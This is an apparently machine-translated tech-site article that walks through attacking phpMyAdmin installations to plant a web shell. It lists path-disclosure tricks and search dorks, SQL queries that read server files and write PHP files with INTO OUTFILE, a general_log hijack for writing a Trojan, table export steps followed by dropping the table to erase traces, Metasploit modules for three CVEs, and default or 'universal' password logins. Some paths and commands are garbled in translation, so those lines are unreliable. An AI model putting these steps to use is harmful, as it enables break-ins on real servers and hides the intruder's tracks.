Shulou(Shulou.com)06/01 Report--

This article introduces the relevant knowledge of "the introduction of phpMydmin and the usage of GetShell". Many people will encounter such a dilemma in the operation of actual cases, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Introduction to phpMyadmin

PhpMyadmin is a PHP-based MySQL database management tool that enables webmasters to manage databases through the Web interface.

Information collection

This part mainly needs to collect the physical path of the website, otherwise you will not be able to connect to Shell through URL

Physical path

Query the database storage path to speculate the physical path of the website, which can also be obtained from the log variable.

Select @ @ datadir

Configuration file burst path: if the injection point has file read permission, you can try to read the configuration file through load_file

# Windows c:\ windows\ php.ini # php configuration file c:\ windows\ system32\ inetsrv\ MetaBase.xml # IIS virtual host configuration file # Linux / etc/php.ini # php configuration file / etc/httpd/conf.d/php.conf / etc/httpd/conf/httpd.conf # Apache configuration file / usr/local/apache/conf/httpd.conf / usr/local/apache2/conf/httpd.conf / usr/local/apache/conf/extra/httpd-vhosts.conf # Virtual directory configuration file

Single quotation mark burst path: put single quotation marks directly after the URL. Requires that single quotation marks are not filtered (gpc=off) and that the server returns an error message by default.

Www.abc.com/index.php?id=1'

Error parameter value explosion path: try to change the parameter value to be submitted to an error value.

Www.abc.com/index.php?id=-1

Nginx file type error parsing burst path: the Web server is required to be Nginx, and there is a file type parsing vulnerability. Add / x.php to the address of the image, and the picture will not only be executed as a php file, but may also reveal the physical path.

Www.abc.com/bg.jpg/x.php

Google explosion path

Site:xxx.com warning site:xxx.com "fatal error"

Test file burst path

Www.xxx.com/test.php www.xxx.com/ceshi.php www.xxx.com/info.php www.xxx.com/phpinfo.php www.xxx.com/php_info.php www.xxx.com/1.php

Other

PhpMyAdmin/libraries/selectlang.lib.php phpMyAdmin/darkblueorange/layout.inc.php phpmyadmin/themes/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang [] = 1 phpMyAdmin/darkblueorange/layout.inc.php phpMyAdmin/index.php?lang [] = 1 / phpmyadmin/libraries/lect_lang.lib.php / phpMyAdmin/phpinfo.php / phpmyadmin/themes/darkblue_orange/layout.inc.php / phpmyadmin/libraries/select_lang.lib.php / phpmyadmin/libraries/mcrypt.lib.php other information

PhpMyadmin background panel can directly see MySQL version, current user, operating system, PHP version, phpMyadmin version and other information.

Other information can also be obtained through SQL query.

Select version ();-- View database version select @ @ datadir;-- View database storage path show VARIABLES like'% char%';-- View system variable GetShell prerequisite

The real path to the website. If you don't know the real path of the website, you can't connect to shell through URL later.

Read and write permissions. Query the secure_file_priv parameter to see if you have permission to read and write to the file. If it is NULL, you cannot write to shell. This value is a read-only variable and can only be modified through the configuration file, and the service needs to be restarted after the change.

Select @ @ secure_file_priv-- query secure_file_priv-- secure_file_priv=NULL, forbids import and export-- secure_file_priv='', does not restrict import and export-- secure_file_priv=/path/, can only import and export select load_file to the specified directory ('cju into outfile. Phpinfo.php');-- read the file select' 123' into outfile 'cGRAPHANG select load_file;-- write to the file regular PHP.

Write to shell directly through SQL query

-- assume that the physical path is "G:\ phpStudy\ WWW" select''into outfile' GRV 'phpStudyandWWWUniple shell.phptrees; log GetShell

Log files will be created above the MySQL5.0 version, open the log by modifying the global variables of the log, specify the log saving path, and then write a sentence Trojan through the query. In this case, the Trojan will be logged and generate a log file, thus GetShell. But only if you have read and write access to the generated log file.

Query log global variables

Show variables like'% general%'; Variable_name Value general_log OFF general_log_file G:\ phpStudy\ MySQL\ data\ FengSec.log

General_log: log save status

General_log_file: log save path

Enable log saving and configure the save path

Set global general_log = "ON";-- Open the log to save set global general_log_file = "G:/phpstudy/WWW/log.php";-- set the log save path. You need to know the physical path of the website first, otherwise you cannot connect through URL even if you write Shell.

Write shell

Select'; new table GetShell

Enter a database and create a new data table.

The name is random, here is shell_table

Fill in 1 for the number of fields

Add a field

Any field name, here is xiaoma

Field type is TEXT

Click insert in the table, and the value is one sentence Trojan

'

Execute a SQL query to export the contents of the table to the specified file

-- assume the physical path is "G:\ phpStudy\ WWW" select * from shell_table into outfile "G:/phpstudy/WWW/shell.php"

Delete the table and erase the trace

Drop TABLE IF EXISTS shell_table

The above steps can also be performed through the MySQL statement

Create TABLE shell_table (xiaoma text NOT NULL)-- create the table Insert INTO shell_table (xiaoma) VALUES ('');-- write select * from shell_table into outfile 'Granger PhpStudyUniverse WWWWBANG GetShell;-- Export Drop TABLE IF EXISTS shell_table;-- delete the special version of the table

CVE-2013-3238

Affected version: 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG

Utilization module: exploit/multi/http/phpmyadminpregreplace

CVE-2012-5159

Affected version: phpMyAdmin v3.5.2.2

Utilization module: exploit/multi/http/phpmyadmin3522_backdoor

CVE-2009-1151

Command execution exists in PhpMyAdmin configuration file / config/config.inc.php

Affected version: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1

Utilization module: exploit/unix/webapp/phpmyadmin_config

Weak password & Universal password

Weak password: version phpmyadmin2.11.9.2, direct root users login without password

Universal password: version 2.11.3 / 2.11.4, login is successful if user name 'localhost'@'@'

This is the end of the introduction to phpMydmin and the usage of GetShell. Thank you for your reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.